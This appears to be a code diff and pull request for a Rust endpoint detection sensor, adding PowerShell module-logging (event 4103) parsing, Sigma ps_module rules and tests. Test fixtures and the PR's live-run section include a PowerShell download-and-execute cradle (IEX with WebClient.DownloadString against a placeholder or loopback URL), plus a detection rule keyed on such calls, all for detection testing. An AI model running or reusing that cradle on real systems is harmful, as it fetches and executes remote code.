+++ b/src/sensor/windows/field_maps.rs
@@ -132,6 +132,23 @@ pub fn powershell_script_mappings() -> &'static FieldMapping {
     &POWERSHELL_SCRIPT_MAP
 }
 
+/// Module logging (event 4103) has its own template: `ContextInfo`,
+/// `UserData` and `Payload`. `UserData` is not mapped because no `ps_module`
+/// rule reads it and it is empty on every event observed.
+static POWERSHELL_MODULE_MAP: LazyLock<FieldMapping> = LazyLock::new(|| {
+    FieldMapping::new(&[
+        ("ContextInfo", "ContextInfo"),
+        ("Payload", "Payload"),
+        ("ProcessId", "ProcessID"),
+        ("Image", "ImageName"),
+        ("User", "UserName"),
+    ])
+});
+
+pub fn powershell_module_mappings() -> &'static FieldMapping {
+    &POWERSHELL_MODULE_MAP
+}
+
 static IMAGE_LOAD_MAP: LazyLock<FieldMapping> = LazyLock::new(|| {
     FieldMapping::new(&[
         ("ImageLoaded", "ImageName"),
@@ -178,4 +195,21 @@ static TASK_CREATION_MAP: LazyLock<FieldMapping> = LazyLock::new(|| {
 
 pub fn task_creation_mappings() -> &'static FieldMapping {
     &TASK_CREATION_MAP
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn powershell_module_mapping_matches_event_4103_template() {
+        let mappings = powershell_module_mappings();
+
+        assert_eq!(mappings.get_etw_field("ContextInfo"), Some("ContextInfo"));
+        assert_eq!(mappings.get_etw_field("Payload"), Some("Payload"));
+        assert_eq!(mappings.get_etw_field("ProcessId"), Some("ProcessID"));
+        assert_eq!(mappings.get_etw_field("Image"), Some("ImageName"));
+        assert_eq!(mappings.get_etw_field("User"), Some("UserName"));
+        assert_eq!(mappings.get_etw_field("UserData"), None);
+    }
 }

--- a/src/sensor/windows/mapper.rs
+++ b/src/sensor/windows/mapper.rs
@@ -45,6 +45,7 @@ fn action_code_for_record(
         EventCategory::Registry => registry_action_code(action),
         EventCategory::Dns => 0,
         EventCategory::Scripting => 0,
+        EventCategory::PowerShellModule => 0,
         EventCategory::Wmi => 0,
         EventCategory::Service => 0,
         EventCategory::Task => 0,
@@ -81,6 +82,7 @@ fn raw_event_id_for_record(category: EventCategory, action_code: u8, record: &Ev
         EventCategory::Registry => u16::from(action_code),
         EventCategory::Dns => record.event_id(),
         EventCategory::Scripting => record.event_id(),
+        EventCategory::PowerShellModule => record.event_id(),
         EventCategory::Wmi => record.event_id(),
         EventCategory::Service => record.event_id(),
         EventCategory::Task => record.event_id(),
@@ -120,6 +122,7 @@ pub fn map_to_sysmon_id(category: EventCategory, action_code: u8, raw_event_id: 
         EventCategory::Dns => 22,
         EventCategory::Wmi
         | EventCategory::Scripting
+        | EventCategory::PowerShellModule
         | EventCategory::Service
         | EventCategory::Task => raw_event_id,
     }
@@ -231,6 +234,7 @@ mod tests {
     fn native_provider_event_ids_are_not_relabelled() {
         for (category, raw_event_id) in [
             (EventCategory::Scripting, 4104),
+            (EventCategory::PowerShellModule, 4103),
             (EventCategory::Wmi, 23),
             (EventCategory::Service, 7045),
             (EventCategory::Task, 106),

--- a/tests/common/mod.rs
+++ b/tests/common/mod.rs
@@ -10,7 +10,7 @@ use rustinel::config::IocConfig;
 use rustinel::models::ecs::EcsAlert;
 use rustinel::models::{
     Alert, DnsQueryFields, EventFields, FileEventFields, NetworkConnectionFields, NormalizedEvent,
-    ProcessCreationFields,
+    PowerShellModuleFields, PowerShellScriptFields, ProcessCreationFields,
 };
 use rustinel::normalizer::Normalizer;
 use rustinel::sensor::{
@@ -226,6 +226,77 @@ pub fn dns_query_event(platform: Platform) -> SensorEvent {
     }
 }
 
+/// PowerShell module logging context, in the shape event 4103 delivers it: a
+/// newline-separated `name = value` block whose `Host Application` line carries
+/// the full interpreter command line.
+pub const TEST_PS_MODULE_CONTEXT: &str = concat!(
+    "        Severity = Informational\n",
+    "        Host Name = ConsoleHost\n",
+    "        Host Version = 5.1.26100.9168\n",
+    "        Host Application = C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe ",
+    "-NoProfile -Command IEX (New-Object System.Net.WebClient)",
+    ".DownloadString('http://example.test/stage.ps1')\n",
+    "        Command Name = New-Object\n",
+    "        Command Type = Cmdlet\n",
+    "        User = lab\\alice\n",
+    "        Shell ID = Microsoft.PowerShell",
+);
+
+pub const TEST_PS_MODULE_PAYLOAD: &str = concat!(
+    "CommandInvocation(New-Object): \"New-Object\"\n",
+    "ParameterBinding(New-Object): name=\"TypeName\"; value=\"System.Net.WebClient\"",
+);
+
+/// Windows PowerShell module logging event (ETW 4103), the `ps_module`
+/// logsource. Only Windows publishes it, so there is no platform parameter.
+pub fn powershell_module_event() -> SensorEvent {
+    SensorEvent {
+        platform: Platform::Windows,
+        provider: "etw",
+        action: SensorAction::Execute,
+        normalization: SensorNormalization {
+            event_id: 4103,
+            action_code: 0,
+        },
+        pid: Some(TEST_PID),
+        timestamp: test_time(),
+        process_start_key: None,
+        payload: SensorPayload::PowerShellModule(PowerShellModuleFields {
+            context_info: Some(TEST_PS_MODULE_CONTEXT.to_string()),
+            payload: Some(TEST_PS_MODULE_PAYLOAD.to_string()),
+            process_id: Some(TEST_PID.to_string()),
+            image: None,
+            user: None,
+        }),
+    }
+}
+
+/// Windows PowerShell script-block logging event (ETW 4104), the existing
+/// `ps_script` logsource. This keeps the compatibility test independent of a
+/// live PowerShell provider.
+pub fn powershell_script_event() -> SensorEvent {
+    SensorEvent {
+        platform: Platform::Windows,
+        provider: "etw",
+        action: SensorAction::Execute,
+        normalization: SensorNormalization {
+            event_id: 4104,
+            action_code: 0,
+        },
+        pid: Some(TEST_PID),
+        timestamp: test_time(),
+        process_start_key: None,
+        payload: SensorPayload::Scripting(PowerShellScriptFields {
+            script_block_text: Some("Get-Process".to_string()),
+            script_block_id: Some("script-block-4104".to_string()),
+            path: Some(r"C:\lab\fixture.ps1".to_string()),
+            process_id: Some(TEST_PID.to_string()),
+            image: Some(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe".to_string()),
+            user: Some("LAB\\alice".to_string()),
+        }),
+    }
+}
+
 /// Build a file event whose numbering comes from the shared sensor table, so
 /// fixtures cannot encode a mapping that no sensor actually emits.
 pub fn file_event(
@@ -308,6 +379,30 @@ detection:
 level: high
 "#
             ),
+        )
+    }
+
+    /// A `ps_module` rule shaped like the SigmaHQ corpus: no `service`, and
+    /// selections that read only `ContextInfo` and `Payload`.
+    pub fn write_ps_module_rule(&self) -> PathBuf {
+        self.write_rule(
+            "ps_module.yml",
+            r#"title: Test PowerShell Module Download
+logsource:
+  product: windows
+  category: ps_module
+detection:
+  selection_webclient:
+    ContextInfo|contains: "System.Net.WebClient"
+  selection_function:
+    ContextInfo|contains:
+      - ".DownloadFile("
+      - ".DownloadString("
+  selection_payload:
+    Payload|contains: "CommandInvocation(New-Object)"
+  condition: all of selection_*
+level: medium
+"#,
         )
     }
 
@@ -507,6 +602,7 @@ pub fn event_fields_from_payload(event: SensorEvent) -> EventFields {
         SensorPayload::Registry(fields) => EventFields::RegistryEvent(fields),
         SensorPayload::ImageLoad(fields) => EventFields::ImageLoad(fields),
         SensorPayload::Scripting(fields) => EventFields::PowerShellScript(fields),
+        SensorPayload::PowerShellModule(fields) => EventFields::PowerShellModule(fields),
         SensorPayload::Wmi(fields) => EventFields::WmiEvent(fields),
         SensorPayload::Service(fields) => EventFields::ServiceCreation(fields),
         SensorPayload::Task(fields) => EventFields::TaskCreation(fields),

--- a/tests/ecs_contract.rs
+++ b/tests/ecs_contract.rs
@@ -10,8 +10,8 @@ use common::{
 use rustinel::models::{
     Alert, AlertSeverity, DetectionEngine, DnsQueryFields, EventCategory, EventFields,
     FileEventFields, ImageLoadFields, NetworkConnectionFields, NormalizedEvent,
-    PowerShellScriptFields, ProcessCreationFields, RegistryEventFields, ServiceCreationFields,
-    TaskCreationFields, WmiEventFields,
+    PowerShellModuleFields, PowerShellScriptFields, ProcessCreationFields, RegistryEventFields,
+    ServiceCreationFields, TaskCreationFields, WmiEventFields,
 };
 use rustinel::sensor::Platform;
 use serde_json::json;
@@ -250,6 +250,27 @@ fn ecs_category_coverage_maps_event_contract_fields() {
             json!(["info"]),
             "powershell-script",
             "edr.powershell.script_block_text",
+        ),
+        (
+            alert(
+                EventCategory::PowerShellModule,
+                4103,
+                0,
+                EventFields::PowerShellModule(PowerShellModuleFields {
+                    context_info: Some("Host Application = powershell.exe".to_string()),
+                    payload: Some("CommandInvocation(New-Object)".to_string()),
+                    process_id: Some("111".to_string()),
+                    image: Some(
+                        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe".to_string(),
+                    ),
+                    user: Some("alice".to_string()),
+                }),
+            ),
+            "edr.powershell_module",
+            json!(["process"]),
+            json!(["info"]),
+            "powershell-module",
+            "edr.powershell.context_info",
         ),
         (
             alert(

--- a/tests/pipeline_sigma.rs
+++ b/tests/pipeline_sigma.rs
@@ -4,9 +4,9 @@ mod common;
 use common::{
     assert_ecs_field_eq, assert_ecs_field_present, assert_normalized_field_eq, ecs_json,
     file_create_event, file_delete_event, file_rename_event, image_for, network_connect_event,
-    process_start_event, provider_for, renamed_test_file_path, test_file_path, SigmaFixture,
-    TestNormalizer, TEST_DESTINATION_IP, TEST_DESTINATION_PORT, TEST_PID, TEST_SOURCE_IP,
-    TEST_USER,
+    powershell_module_event, process_start_event, provider_for, renamed_test_file_path,
+    test_file_path, SigmaFixture, TestNormalizer, TEST_DESTINATION_IP, TEST_DESTINATION_PORT,
+    TEST_PID, TEST_PS_MODULE_CONTEXT, TEST_PS_MODULE_PAYLOAD, TEST_SOURCE_IP, TEST_USER,
 };
 use rustinel::{
     engine::Engine,
@@ -68,6 +68,81 @@ fn sigma_process_detection_pipeline_maps_to_ecs_for_windows_and_linux() {
         assert_ecs_field_eq(&ecs, "process.executable", image_for(platform));
         assert_ecs_field_eq(&ecs, "process.pid", TEST_PID);
     }
+}
+
+#[test]
+fn sigma_ps_module_detection_pipeline_maps_to_ecs() {
+    // Event 4103 shares the PowerShell provider with the script block event,
+    // so the thing worth proving is that it lands on `ps_module` with its own
+    // two fields rather than being read back as a `ps_script` event.
+    let fixture = SigmaFixture::new();
+    fixture.write_ps_module_rule();
+    let engine = load_engine(Platform::Windows, &fixture);
+    let harness = TestNormalizer::new(false);
+
+    let normalized = harness
+        .normalizer
+        .normalize(&powershell_module_event())
+        .expect("module logging event should normalize");
+
+    assert_eq!(normalized.category, EventCategory::PowerShellModule);
+    assert_eq!(normalized.event_id, 4103);
+    assert!(matches!(
+        normalized.fields,
+        EventFields::PowerShellModule(_)
+    ));
+    assert_normalized_field_eq(&normalized, "ContextInfo", TEST_PS_MODULE_CONTEXT);
+    assert_normalized_field_eq(&normalized, "Payload", TEST_PS_MODULE_PAYLOAD);
+
+    let alert = engine
+        .check_event(&normalized)
+        .expect("ps_module Sigma rule should match");
+    assert_sigma_alert(&alert, "Test PowerShell Module Download");
+
+    let ecs = ecs_json(&alert);
+    assert_ecs_field_eq(&ecs, "event.dataset", "edr.powershell_module");
+    assert_ecs_field_eq(&ecs, "event.action", "powershell-module");
+    assert_ecs_field_eq(&ecs, "edr.powershell.context_info", TEST_PS_MODULE_CONTEXT);
+    assert_ecs_field_eq(&ecs, "edr.powershell.payload", TEST_PS_MODULE_PAYLOAD);
+    assert_ecs_field_eq(&ecs, "process.pid", TEST_PID);
+}
+
+#[test]
+fn sigma_ps_script_event_4104_keeps_existing_behavior() {
+    let fixture = SigmaFixture::new();
+    fixture.write_rule(
+        "ps_script.yml",
+        r#"title: Test PowerShell Script Block
+logsource:
+  product: windows
+  category: ps_script
+detection:
+  selection:
+    ScriptBlockText|contains: "Get-Process"
+  condition: selection
+level: medium
+"#,
+    );
+    let engine = load_engine(Platform::Windows, &fixture);
+    let harness = TestNormalizer::new(false);
+
+    let normalized = harness
+        .normalizer
+        .normalize(&common::powershell_script_event())
+        .expect("script-block event should normalize");
+
+    assert_eq!(normalized.category, EventCategory::Scripting);
+    assert_eq!(normalized.event_id, 4104);
+    assert_normalized_field_eq(&normalized, "ScriptBlockText", "Get-Process");
+
+    let alert = engine
+        .check_event(&normalized)
+        .expect("ps_script Sigma rule should still match");
+    assert_sigma_alert(&alert, "Test PowerShell Script Block");
+
+    let ecs = ecs_json(&alert);
+    assert_ecs_field_eq(&ecs, "event.dataset", "edr.scripting");
+    assert_ecs_field_eq(&ecs, "event.action", "powershell-script");
 }
 
 #[test]

--- a/tests/rsigma_engine_parity.rs
+++ b/tests/rsigma_engine_parity.rs
@@ -10,7 +10,10 @@
 #[cfg(test)]
 mod common;
 
-use common::{network_connect_event, process_start_event, SigmaFixture, TestNormalizer};
+use common::{
+    network_connect_event, powershell_module_event, process_start_event, SigmaFixture,
+    TestNormalizer,
+};
 use rustinel::engine::{Engine, SigmaEngineKind};
 use rustinel::models::MatchDebugLevel;
 use rustinel::sensor::Platform;
@@ -144,5 +147,24 @@ level: high
             alert.rule_name, "Parity Process ContainsAll Regex",
             "backend {kind:?}"
         );
+    }
+}
+
+#[test]
+fn powershell_module_rule_matches_on_every_backend() {
+    let fixture = SigmaFixture::new();
+    fixture.write_ps_module_rule();
+    let harness = TestNormalizer::new(false);
+    let normalized = harness
+        .normalizer
+        .normalize(&powershell_module_event())
+        .expect("module logging event should normalize");
+
+    for kind in backends() {
+        let engine = engine_with(&fixture, Platform::Windows, kind);
+        let alert = engine
+            .check_event(&normalized)
+            .unwrap_or_else(|| panic!("ps_module rule should match ({kind:?})"));
+        assert_eq!(alert.rule_name, "Test PowerShell Module Download");
     }
 }


### PR DESCRIPTION
## Summary

- add event 4103 to the existing `Microsoft-Windows-PowerShell` provider and route it to the `ps_module` Sigma logsource
- subscribe to the `Cmdlets` keyword (0x20) alongside `Runspace` (0x1), because 4103 is published under the former and 4104 under the latter
- decode `ContextInfo` and `Payload` into a new `PowerShellModule` category, payload and ECS dataset (`edr.powershell_module`)
- route PowerShell records on their event ID rather than on the provider GUID, since one provider now carries two logsources
- leave the 4104 / `ps_script` path completely untouched
- document the Module Logging policy the host needs, and the localization behaviour of the two fields

Closes #322. No new provider and no new ETW session.

## Why the keyword matters

Read off the manifest on a Windows 11 lab host rather than assumed:

| Event | Level | Keyword mask | Logsource |
| --- | --- | --- | --- |
| 4104 script block | Verbose (5) | `0x8000_0000_0000_0001` (`Runspace`) | `ps_script` |
| 4103 module logging | Informational (4) | `0x8000_0000_0000_0020` (`Cmdlets`) | `ps_module` |

A session enabled with `Runspace` alone is never sent 4103, whatever the event ID filter says — so adding the event ID without the keyword would have been a silent no-op. An ETW level is a ceiling, so the existing level 5 already covers the Informational event.

Widening the keyword also exposes the analytic command-lifecycle events (7937/7938/7939, ~40 per interpreter run). The provider-side `EventFilter::ByEventIds` filter keeps them out of the session buffers entirely, so there is no added buffer volume.

## Host policy requirement

Module logging is **off by default** and, unlike script block logging, has no automatic path: with the policy disabled PowerShell writes no 4103 at all, so no session setting can recover it. Measured on the lab host with an identical workload:

| `EnableModuleLogging` | 4103 events captured |
| --- | ---: |
| absent | 0 |
| `1` with `ModuleNames` `*`=`*` | 5 |

Documented in `detection.md` (with the registry snippet), `troubleshooting.md` (as a symptom), and `limitations.md` (as a silent risk, together with the localization trap below).

## Localization

`ContextInfo` and `Payload` are free-form provider text written in the **host's display language**. On the French lab host, `Host Application =` appears as `Application hôte =` and `CommandInvocation(Get-ChildItem)` as `CommandInvocation (Get-ChildItem)` — note the extra space. A rule matching an English *label* does not fire there; a rule matching a *value* (`System.Net.WebClient`, a command line) does. Nothing can be done about this in the sensor, so it is documented as a silent risk rather than worked around. The agent's own output is correct UTF-8.

## Corpus effect

All 34 SigmaHQ `ps_module` rules now load and classify as active, and every one of them references only `ContextInfo` and `Payload`:

```
rule_files_found = 34   total_rules = 34
skipped_deferred = 0    skipped_unknown = 0
skipped_product = 0     inactive_collector = 0
by_logsource = {"product: windows, category: ps_module": 34}
```

`coverage.md` records this against the existing pinned measurement rather than restating the headline, since the audit was not re-run.

## Validation

macOS:
- `cargo test` — full suite, all green
- `cargo clippy --all-targets -- -D clippy::all`
- `cargo fmt --all -- --check`

lab-windows (Windows 11, 6 vCPU, 8 GB):
- `cargo test --all-targets` — 332 unit + all integration tests pass
- `cargo clippy --all-targets -- -D clippy::all`
- Windows-only tests exercised: `powershell_filter_matches_routing_allowlist`, `powershell_module_mapping_matches_event_4103_template`, `user_providers_are_scoped_to_matchable_events`, `fieldless_provider_payload_is_not_matchable`

New tests:
- `sigma_ps_module_detection_pipeline_maps_to_ecs` — sensor payload through normalizer, engine and ECS
- `sigma_ps_script_event_4104_keeps_existing_behavior` — 4104 regression guard
- `powershell_module_rule_matches_on_every_backend` — both the built-in matcher and the RSigma engine
- `powershell_filter_matches_routing_allowlist` — the provider filter and the router cannot drift apart
- `powershell_module_mapping_matches_event_4103_template` — pins the field map, including `UserData` staying unmapped

### Live agent run

Ran the built agent on lab-windows against the **verbatim SigmaHQ** `posh_pm_susp_download.yml` detection block, triggering `powershell -Command "Get-ChildItem C:\ | Out-Null; IEX ((New-Object System.Net.WebClient).DownloadString('http://127.0.0.1:9/nope'))"`. Seven alerts on real decoded 4103 events; first one abridged:

```json
{
  "event.dataset": "edr.powershell_module",
  "event.action": "powershell-module",
  "event.code": "4103",
  "rule.name": "LIVE Suspicious PowerShell Download - PoshModule",
  "rule.id": "sigma::de41232e-12e8-49fa-86bc-c05c7e722df9",
  "process.executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
  "process.pid": 3820,
  "edr.powershell.context_info": "… Application hôte = C:\\WINDOWS\\…\\powershell.exe -NoProfile -Command Get-ChildItem C:\\ | Out-Null; IEX ((New-Object System.Net.WebClient).DownloadString('http://127.0.0.1:9/nope')) …",
  "edr.powershell.payload": "CommandInvocation (Get-ChildItem) : « Get-ChildItem » …",
  "edr.match": {
    "summary": "condition matched: all of selection_*; selection_webclient_ matched ContextInfo contains 'System.Net.WebClient'"
  }
}
```

The alert file was verified to be valid UTF-8 with intact accents.

## Type of change

- [x] `feat` / `enhancement` — new feature

## Test plan

- [x] Tested on Windows
- [ ] Tested on Linux — n/a, Windows-only telemetry
- [x] Existing tests pass (`cargo test`)
- [x] New tests added

## Checklist

- [x] Label added to this PR
- [x] Docs updated — `detection.md`, `troubleshooting.md`, `limitations.md`, `coverage.md`, `output.md`, `architecture.md`
